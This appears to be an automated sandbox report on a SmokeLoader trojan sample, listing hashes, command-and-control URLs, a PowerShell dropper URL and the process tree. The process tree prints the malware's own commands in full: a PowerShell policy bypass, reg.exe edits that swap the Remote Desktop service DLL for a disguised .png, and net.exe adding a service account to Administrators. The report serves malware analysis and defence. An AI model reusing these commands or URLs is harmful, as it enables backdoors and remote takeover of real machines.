smokeloader | e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6

Analysis

max time kernel
150s
max time network
151s
platform
windows10_x64
resource
win10-en-20210920
submitted
28-10-2021 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Size

186KB
MD5

77402ae9e6880f83a282662fbfdea75c
SHA1

655495fab60a558634040b83cefe927c3cfa7578
SHA256

e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6
SHA512

01f179c698e96fb1118ea08a40e96f941cebbf5386f980f832e5339b65c48486fff317208ec5ec50ca9f704bac39960f5d95d92173310cd7992dea6ea3ad29ad

Score

10^/10

smokeloader backdoor persistence suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
56	3192	powershell.exe
58	3192	powershell.exe
59	3192	powershell.exe
60	3192	powershell.exe
62	3192	powershell.exe
64	3192	powershell.exe
66	3192	powershell.exe
68	3192	powershell.exe
71	3192	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

77DB.exe

pid process

2772 77DB.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2772	77DB.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

pid process

3036
Loads dropped DLL 2 IoCs

Processes:

pid process

1572
1572

pid	process
3036

pid	process
1572
1572

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA61.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAC2.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4dwfkgmr.tiv.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xjvya5gl.jhz.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA41.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAB2.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA82.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1504 reg.exe
Runs net.exe

pid	process
1504	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	60	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe

pid	process
3648	e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
3648	e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3036
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

632
632
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe

pid process

3648 e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe

pid	process
3036

pid	process
632
632

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeIncreaseQuotaPrivilege	2852	powershell.exe
Token: SeSecurityPrivilege	2852	powershell.exe
Token: SeTakeOwnershipPrivilege	2852	powershell.exe
Token: SeLoadDriverPrivilege	2852	powershell.exe
Token: SeSystemProfilePrivilege	2852	powershell.exe
Token: SeSystemtimePrivilege	2852	powershell.exe
Token: SeProfSingleProcessPrivilege	2852	powershell.exe
Token: SeIncBasePriorityPrivilege	2852	powershell.exe
Token: SeCreatePagefilePrivilege	2852	powershell.exe
Token: SeBackupPrivilege	2852	powershell.exe
Token: SeRestorePrivilege	2852	powershell.exe
Token: SeShutdownPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeSystemEnvironmentPrivilege	2852	powershell.exe
Token: SeRemoteShutdownPrivilege	2852	powershell.exe
Token: SeUndockPrivilege	2852	powershell.exe
Token: SeManageVolumePrivilege	2852	powershell.exe
Token: 33	2852	powershell.exe
Token: 34	2852	powershell.exe
Token: 35	2852	powershell.exe
Token: 36	2852	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeIncreaseQuotaPrivilege	1640	powershell.exe
Token: SeSecurityPrivilege	1640	powershell.exe
Token: SeTakeOwnershipPrivilege	1640	powershell.exe
Token: SeLoadDriverPrivilege	1640	powershell.exe
Token: SeSystemProfilePrivilege	1640	powershell.exe
Token: SeSystemtimePrivilege	1640	powershell.exe
Token: SeProfSingleProcessPrivilege	1640	powershell.exe
Token: SeIncBasePriorityPrivilege	1640	powershell.exe
Token: SeCreatePagefilePrivilege	1640	powershell.exe
Token: SeBackupPrivilege	1640	powershell.exe
Token: SeRestorePrivilege	1640	powershell.exe
Token: SeShutdownPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeSystemEnvironmentPrivilege	1640	powershell.exe
Token: SeRemoteShutdownPrivilege	1640	powershell.exe
Token: SeUndockPrivilege	1640	powershell.exe
Token: SeManageVolumePrivilege	1640	powershell.exe
Token: 33	1640	powershell.exe
Token: 34	1640	powershell.exe
Token: 35	1640	powershell.exe
Token: 36	1640	powershell.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeIncreaseQuotaPrivilege	372	powershell.exe
Token: SeSecurityPrivilege	372	powershell.exe
Token: SeTakeOwnershipPrivilege	372	powershell.exe
Token: SeLoadDriverPrivilege	372	powershell.exe
Token: SeSystemProfilePrivilege	372	powershell.exe
Token: SeSystemtimePrivilege	372	powershell.exe
Token: SeProfSingleProcessPrivilege	372	powershell.exe
Token: SeIncBasePriorityPrivilege	372	powershell.exe
Token: SeCreatePagefilePrivilege	372	powershell.exe
Token: SeBackupPrivilege	372	powershell.exe
Token: SeRestorePrivilege	372	powershell.exe
Token: SeShutdownPrivilege	372	powershell.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeSystemEnvironmentPrivilege	372	powershell.exe
Token: SeRemoteShutdownPrivilege	372	powershell.exe
Token: SeUndockPrivilege	372	powershell.exe
Token: SeManageVolumePrivilege	372	powershell.exe
Token: 33	372	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

3036
3036
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

3036
3036

pid	process
3036
3036

pid	process
3036
3036

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

77DB.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 3036 wrote to memory of 2772	3036		77DB.exe
PID 3036 wrote to memory of 2772	3036		77DB.exe
PID 2772 wrote to memory of 1756	2772	77DB.exe	powershell.exe
PID 2772 wrote to memory of 1756	2772	77DB.exe	powershell.exe
PID 1756 wrote to memory of 1676	1756	powershell.exe	csc.exe
PID 1756 wrote to memory of 1676	1756	powershell.exe	csc.exe
PID 1676 wrote to memory of 1952	1676	csc.exe	cvtres.exe
PID 1676 wrote to memory of 1952	1676	csc.exe	cvtres.exe
PID 1756 wrote to memory of 2852	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 2852	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 1640	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 1640	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 372	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 372	1756	powershell.exe	powershell.exe
PID 1756 wrote to memory of 3012	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 3012	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 1504	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 1504	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 2284	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 2284	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 2996	1756	powershell.exe	net.exe
PID 1756 wrote to memory of 2996	1756	powershell.exe	net.exe
PID 2996 wrote to memory of 2988	2996	net.exe	net1.exe
PID 2996 wrote to memory of 2988	2996	net.exe	net1.exe
PID 1756 wrote to memory of 2556	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 2556	1756	powershell.exe	cmd.exe
PID 2556 wrote to memory of 2264	2556	cmd.exe	cmd.exe
PID 2556 wrote to memory of 2264	2556	cmd.exe	cmd.exe
PID 2264 wrote to memory of 4076	2264	cmd.exe	net.exe
PID 2264 wrote to memory of 4076	2264	cmd.exe	net.exe
PID 4076 wrote to memory of 716	4076	net.exe	net1.exe
PID 4076 wrote to memory of 716	4076	net.exe	net1.exe
PID 1756 wrote to memory of 4040	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 4040	1756	powershell.exe	cmd.exe
PID 4040 wrote to memory of 2364	4040	cmd.exe	cmd.exe
PID 4040 wrote to memory of 2364	4040	cmd.exe	cmd.exe
PID 2364 wrote to memory of 380	2364	cmd.exe	net.exe
PID 2364 wrote to memory of 380	2364	cmd.exe	net.exe
PID 380 wrote to memory of 948	380	net.exe	net1.exe
PID 380 wrote to memory of 948	380	net.exe	net1.exe
PID 2172 wrote to memory of 2816	2172	cmd.exe	net.exe
PID 2172 wrote to memory of 2816	2172	cmd.exe	net.exe
PID 2816 wrote to memory of 4024	2816	net.exe	net1.exe
PID 2816 wrote to memory of 4024	2816	net.exe	net1.exe
PID 1420 wrote to memory of 1740	1420	cmd.exe	net.exe
PID 1420 wrote to memory of 1740	1420	cmd.exe	net.exe
PID 1740 wrote to memory of 1304	1740	net.exe	net1.exe
PID 1740 wrote to memory of 1304	1740	net.exe	net1.exe
PID 1952 wrote to memory of 3544	1952	cmd.exe	net.exe
PID 1952 wrote to memory of 3544	1952	cmd.exe	net.exe
PID 3544 wrote to memory of 3180	3544	net.exe	net1.exe
PID 3544 wrote to memory of 3180	3544	net.exe	net1.exe
PID 1656 wrote to memory of 3744	1656	cmd.exe	net.exe
PID 1656 wrote to memory of 3744	1656	cmd.exe	net.exe
PID 3744 wrote to memory of 3868	3744	net.exe	net1.exe
PID 3744 wrote to memory of 3868	3744	net.exe	net1.exe
PID 3900 wrote to memory of 3012	3900	cmd.exe	net.exe
PID 3900 wrote to memory of 3012	3900	cmd.exe	net.exe
PID 3012 wrote to memory of 1504	3012	net.exe	net1.exe
PID 3012 wrote to memory of 1504	3012	net.exe	net1.exe
PID 3000 wrote to memory of 3808	3000	cmd.exe	net.exe
PID 3000 wrote to memory of 3808	3000	cmd.exe	net.exe
PID 3808 wrote to memory of 508	3808	net.exe	net1.exe
PID 3808 wrote to memory of 508	3808	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
"C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3648

C:\Users\Admin\AppData\Local\Temp\77DB.exe
C:\Users\Admin\AppData\Local\Temp\77DB.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp" "c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMP"
4⤵
PID:1952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:3012

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:1504

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2284

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2988

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:4076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:716

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
